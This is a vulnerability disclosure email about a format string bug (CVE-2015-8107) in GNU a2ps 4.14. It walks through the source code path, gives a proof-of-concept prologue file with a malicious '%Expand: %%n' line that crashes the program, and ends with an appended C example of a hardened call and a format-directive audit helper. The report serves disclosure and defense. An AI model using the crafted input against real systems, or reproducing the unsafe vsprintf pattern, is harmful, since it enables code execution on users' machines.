From: 김종권
Subject: Format string bug report in a2ps
Date: Thu, 12 Nov 2015 14:40:31 +0900
User-agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.3.0

Dear Gnu-a2ps team,
I am writing this to report a format string vulnerability in a2ps (4.14, which is the latest version). I have also already been assigned a CVE identifier from MITRE, "CVE-2015-8107", so I want to make this vulnerability public.

- Target Platform
  Linux

- Target Version
  4.14 (Latest Version)

- Vulnerability description

When a user runs a2ps with a maliciously crafted pro (a2ps prologue) file, an attacker can execute arbitrary code. The function output_file processes the %Expand command in the pro file. The variable `expansion' in the function output_file may hold a malicious input string, which is then used as the format argument of vsprintf.

-- Step 1. (output.c line 524)

    524       expansion = ((char *) expand_user_string (job, FIRST_FILE (job),
                                                        (const uchar *) "Expand: requirement",
                                                        (const uchar *) token));

For instance, the variable expansion will point to the string “%n” when a text line "%Expand: %%\n” exists in an input pro file.

-- Step 2. (output.c line 525)

    525       output (dest, expansion);

output() is called in line 525, and the argument `expansion' is used as a format string, which can be malicious, as described in step 1.

-- Step 3. (output.c 873 line)

    182 void
        output (struct output * out, const char *format, ...)
        {
        ...
    202   ds_unsafe_cat_vsprintf (out->chunk, format, args);
        ...

The variable format, which can be malicious, is passed to ds_unsafe_cat_vsprintf() in line 202.

-- Step 4. (dstring.c line 321)

    321 void
        ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format, va_list args)
        {
        ...
    326   vsprintf (ds->content + ds->len, format, args);
        ...

The value of format, which can be malicious, is used as the format argument of vsprintf in line 326; therefore arbitrary code can be executed.

-- Step 5. Our malicious input "exploit.pro"

===================================
% -*-postscript-*-
% PostScript Prologue
%
% $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
%
%
% This file is part of a2ps.
%
% This program is free software; you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3, or (at your option)
% any later version.
%
% This program is distributed in the hope that it will be useful,
% but WITHOUT ANY WARRANTY; without even the implied warranty of
% MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
% GNU General Public License for more details.
%
% You should have received a copy of the GNU General Public License
% along with this program; see the file COPYING.  If not, write to
% the Free Software Foundation, 59 Temple Place - Suite 330,
% Boston, MA 02111-1307, USA.

% Documentation
The layout is the same as samp(bw)samp, but alternating gray and white
lines.  There are two macros defining the behavior:
samp(pro.matrix.cycle)samp defines the length of the cycle (number of
white and gray lines).  It defaults to 6.
samp(pro.matrix.gray)samp defines the number of gray lines.  Default is 3.
EndDocumentation

% -- code follows this line --
%%IncludeResource: file base.ps
%%IncludeResource: file a2ps.hdr

%%BeginResource: procset a2ps-matrix-Prolog 2.0 1

% Function T(ab), jumps to the n-th tabulation in the current line
/T { cw mul x0 add y0 moveto } bind def

% Function n: move to the next line
/n { %def
  /y0 y0 bfs sub store
  % Draw a grey background
  /nline nline 1 add def
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
% @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@
%Expand: %%n
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
%Expand: nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
    gsave
      newpath
      x v get y0 currentfont /Descent get currentfontsize mul add moveto
      pw 0 rlineto
      0 bfs rlineto
      pw neg 0 rlineto
      closepath
      0.9 setgray fill
    grestore
  } if
  x0 y0 moveto
} bind def

% Function N: show and move to the next line
/N { Show n } bind def

/S { Show } bind def

/p {
  false UL
  false BX
%Face: Plain Courier bfs
  Show
} bind def

/sy {
  false UL
  false BX
%Face: Symbol Symbol bfs
  Show
} bind def

/k {
  false UL
  false BX
%Face: Keyword Courier-Oblique bfs
  Show
} bind def

/K {
  false UL
  false BX
%Face: Keyword_strong Courier-Bold bfs
  Show
} bind def

/c {
  false UL
  false BX
%Face: Comment Courier-Oblique bfs
  Show
} bind def

/C {
  false UL
  false BX
%Face: Comment_strong Courier-BoldOblique bfs
  Show
} bind def

/l {
  false UL
  false BX
%Face: Label Helvetica bfs
  Show
} bind def

/L {
  false UL
  false BX
%Face: Label_strong Helvetica-Bold bfs
  Show
} bind def

/str{
  false UL
  false BX
%Face: String Times-Roman bfs
  Show
} bind def

/e{
  false UL
  true BX
%Face: Error Helvetica-Bold bfs
  Show
} bind def

%%EndResource
%%BeginSetup
% The font for line numbering
/f# /Helvetica findfont bfs .6 mul scalefont def
/nline 0 def
%%EndSetup
===================================

Execute

===================================
~ $ a2ps --version
GNU a2ps 4.14
Written by Akim Demaille, Miguel Santana.

Copyright (c) 1988-1993 Miguel Santana
Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
~ $ a2ps --prologue=exploit test.tex -o test.ps
aborted (core dumped)
===================================

- How we found the vulnerability

We used a static analyzer, Sparrow [1], to find the format string bug. Our analyzer reported an alarm at a2ps dstring.c line 326, so we looked at the a2ps source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed on abstract interpretation, and the analysis is sound by design. Sparrow adopts a number of well-founded static analysis techniques [2,3] for scalability, precision, and user convenience.

References

[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12.

Sincerely,
Woosuk Lee & Jong-Gwon Kim

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) address@hidden
-----------------------------

-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) address@hidden
-----------------------------
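As an added example, not part of the report above and not a2ps's own code: a small C model of the sink described in steps 2 to 4, placed beside the hardened form. The unsafe shape is `output (dest, expansion)`, where the expansion string itself becomes the printf format; the hardened shape passes a literal "%s" format and hands the expansion over as an argument, so a "%n" produced by an %Expand line is emitted as two characters rather than interpreted. The block also includes a small audit helper that counts live conversion directives in a string that is about to reach a printf-family function, which is the condition the report's analyzer flagged at dstring.c line 326. The function names, the bounded vsnprintf (a2ps's ds_unsafe_cat_vsprintf uses unbounded vsprintf into a dstring), the 256-byte buffer and the sample input are assumptions of this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Model of the output() -> ds_unsafe_cat_vsprintf() chain from steps 3 and 4:
 * whatever arrives in `format` is interpreted by the printf engine.  This is
 * only safe when `format` is a literal chosen by the programmer, never when
 * it is a string derived from a prologue file. */
static int output(char *dst, size_t cap, const char *format, ...)
{
    va_list args;
    int n;
    va_start(args, format);
    /* vsnprintf is bounded here; the real dstring.c sink is an unbounded vsprintf. */
    n = vsnprintf(dst, cap, format, args);
    va_end(args);
    return n;
}

/* Hardened equivalent of `output (dest, expansion)` from step 2 (example, not
 * the upstream patch): the expansion is data, so it travels as a "%s"
 * argument and is never parsed as a format. */
static int output_expansion(char *dst, size_t cap, const char *expansion)
{
    return output(dst, cap, "%s", expansion);
}

/* Returns 1 if `expansion` reaches the output byte-for-byte, i.e. a "%n"
 * inside it is written out as the characters '%' 'n' and not executed. */
int renders_literally(const char *expansion)
{
    char buf[256];                              /* assumed scratch size */
    int n = output_expansion(buf, sizeof buf, expansion);
    return n >= 0 && (size_t)n < sizeof buf && strcmp(buf, expansion) == 0;
}

/* Audit helper: count active conversion directives in a string that is about
 * to be used as a printf format.  "%%" is a literal percent sign and is not
 * counted.  A non-zero result for a string derived from user input is the
 * situation the report describes; log it or reject the prologue. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip the pair */
            s++;
            continue;
        }
        count++;                /* '%' followed by a conversion (or end of string) */
    }
    return count;
}

int main(void)
{
    /* Constructed sample: the expansion the report derives from "%Expand: %%n". */
    const char *expansion = "%n";
    printf("live directives in \"%s\": %d\n", expansion, count_format_directives(expansion));
    printf("hardened output renders it literally: %d\n", renders_literally(expansion));
    return 0;
}
```

The one-line change this implies for the call at output.c line 525 is to supply a literal format and pass the expansion as its argument; the audit helper is useful as a grep-style check over any string that is built from configuration or input and then flows into output(), since every such site is a candidate for the same defect.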